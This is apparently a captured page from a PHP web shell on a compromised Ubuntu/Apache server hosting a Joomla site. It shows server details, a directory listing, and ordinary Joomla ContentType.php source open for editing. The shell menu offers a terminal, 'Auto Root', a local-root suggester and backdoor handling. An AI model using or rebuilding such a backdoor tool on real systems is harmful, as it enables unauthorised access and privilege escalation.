Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
paroquia-rm.bak /
libraries /
src /
Table /
Delete
Unzip
Name
Size
Permission
Date
Action
Observer
[ DIR ]
drwxr-xr-x
2017-09-19 09:00
Asset.php
4.56
KB
-rw-r--r--
2018-06-26 10:27
Category.php
5.78
KB
-rw-r--r--
2018-06-26 10:27
Content.php
8.77
KB
-rw-r--r--
2018-06-26 10:27
ContentHistory.php
6.59
KB
-rw-r--r--
2018-06-26 10:27
ContentType.php
3.51
KB
-rw-r--r--
2018-06-26 10:27
CoreContent.php
10.57
KB
-rw-r--r--
2018-06-26 10:27
Extension.php
4.74
KB
-rw-r--r--
2018-06-26 10:27
Language.php
3.25
KB
-rw-r--r--
2018-06-26 10:27
Menu.php
7.92
KB
-rw-r--r--
2018-06-26 10:27
MenuType.php
7.66
KB
-rw-r--r--
2018-06-26 10:27
Module.php
4.1
KB
-rw-r--r--
2018-06-26 10:27
Nested.php
48.31
KB
-rw-r--r--
2018-06-26 10:27
Table.php
42.08
KB
-rw-r--r--
2018-06-26 10:27
TableInterface.php
3.42
KB
-rw-r--r--
2018-06-26 10:27
Ucm.php
564
B
-rw-r--r--
2018-06-26 10:27
Update.php
2.39
KB
-rw-r--r--
2018-06-26 10:27
UpdateSite.php
1.04
KB
-rw-r--r--
2018-06-26 10:27
User.php
12.73
KB
-rw-r--r--
2018-06-26 10:27
Usergroup.php
6.21
KB
-rw-r--r--
2018-06-26 10:27
ViewLevel.php
1.83
KB
-rw-r--r--
2018-06-26 10:27
Save
Rename
<?php /** * Joomla! Content Management System * * @copyright Copyright (C) 2005 - 2018 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\CMS\Table; defined('JPATH_PLATFORM') or die; /** * Tags table * * @since 3.1 */ class ContentType extends Table { /** * Constructor * * @param \JDatabaseDriver $db A database connector object * * @since 3.1 */ public function __construct($db) { parent::__construct('#__content_types', 'type_id', $db); } /** * Overloaded check method to ensure data integrity. * * @return boolean True on success. * * @since 3.1 * @throws \UnexpectedValueException */ public function check() { // Check for valid name. if (trim($this->type_title) === '') { throw new \UnexpectedValueException(sprintf('The title is empty')); } $this->type_title = ucfirst($this->type_title); if (empty($this->type_alias)) { throw new \UnexpectedValueException(sprintf('The type_alias is empty')); } return true; } /** * Overridden Table::store. * * @param boolean $updateNulls True to update fields even if they are null. * * @return boolean True on success. * * @since 3.1 */ public function store($updateNulls = false) { // Verify that the alias is unique $table = Table::getInstance('Contenttype', 'JTable', array('dbo' => $this->getDbo())); if ($table->load(array('type_alias' => $this->type_alias)) && ($table->type_id != $this->type_id || $this->type_id == 0)) { $this->setError(\JText::_('COM_TAGS_ERROR_UNIQUE_ALIAS')); return false; } return parent::store($updateNulls); } /** * Method to expand the field mapping * * @param boolean $assoc True to return an associative array. * * @return mixed Array or object with field mappings. Defaults to object. * * @since 3.1 */ public function fieldmapExpand($assoc = true) { return $this->fieldmap = json_decode($this->fieldmappings, $assoc); } /** * Method to get the id given the type alias * * @param string $typeAlias Content type alias (for example, 'com_content.article'). * * @return mixed type_id for this alias if successful, otherwise null. * * @since 3.2 */ public function getTypeId($typeAlias) { $db = $this->_db; $query = $db->getQuery(true); $query->select($db->quoteName('type_id')) ->from($db->quoteName($this->_tbl)) ->where($db->quoteName('type_alias') . ' = ' . $db->quote($typeAlias)); $db->setQuery($query); return $db->loadResult(); } /** * Method to get the Table object for the content type from the table object. * * @return mixed Table object on success, otherwise false. * * @since 3.2 * * @throws \RuntimeException */ public function getContentTable() { $result = false; $tableInfo = json_decode($this->table); if (is_object($tableInfo) && isset($tableInfo->special)) { if (is_object($tableInfo->special) && isset($tableInfo->special->type) && isset($tableInfo->special->prefix)) { $class = isset($tableInfo->special->class) ? $tableInfo->special->class : 'Joomla\\CMS\\Table\\Table'; if (!class_implements($class, 'Joomla\\CMS\\Table\\TableInterface')) { // This isn't an instance of TableInterface. Abort. throw new \RuntimeException('Class must be an instance of Joomla\\CMS\\Table\\TableInterface'); } $result = $class::getInstance($tableInfo->special->type, $tableInfo->special->prefix); } } return $result; } }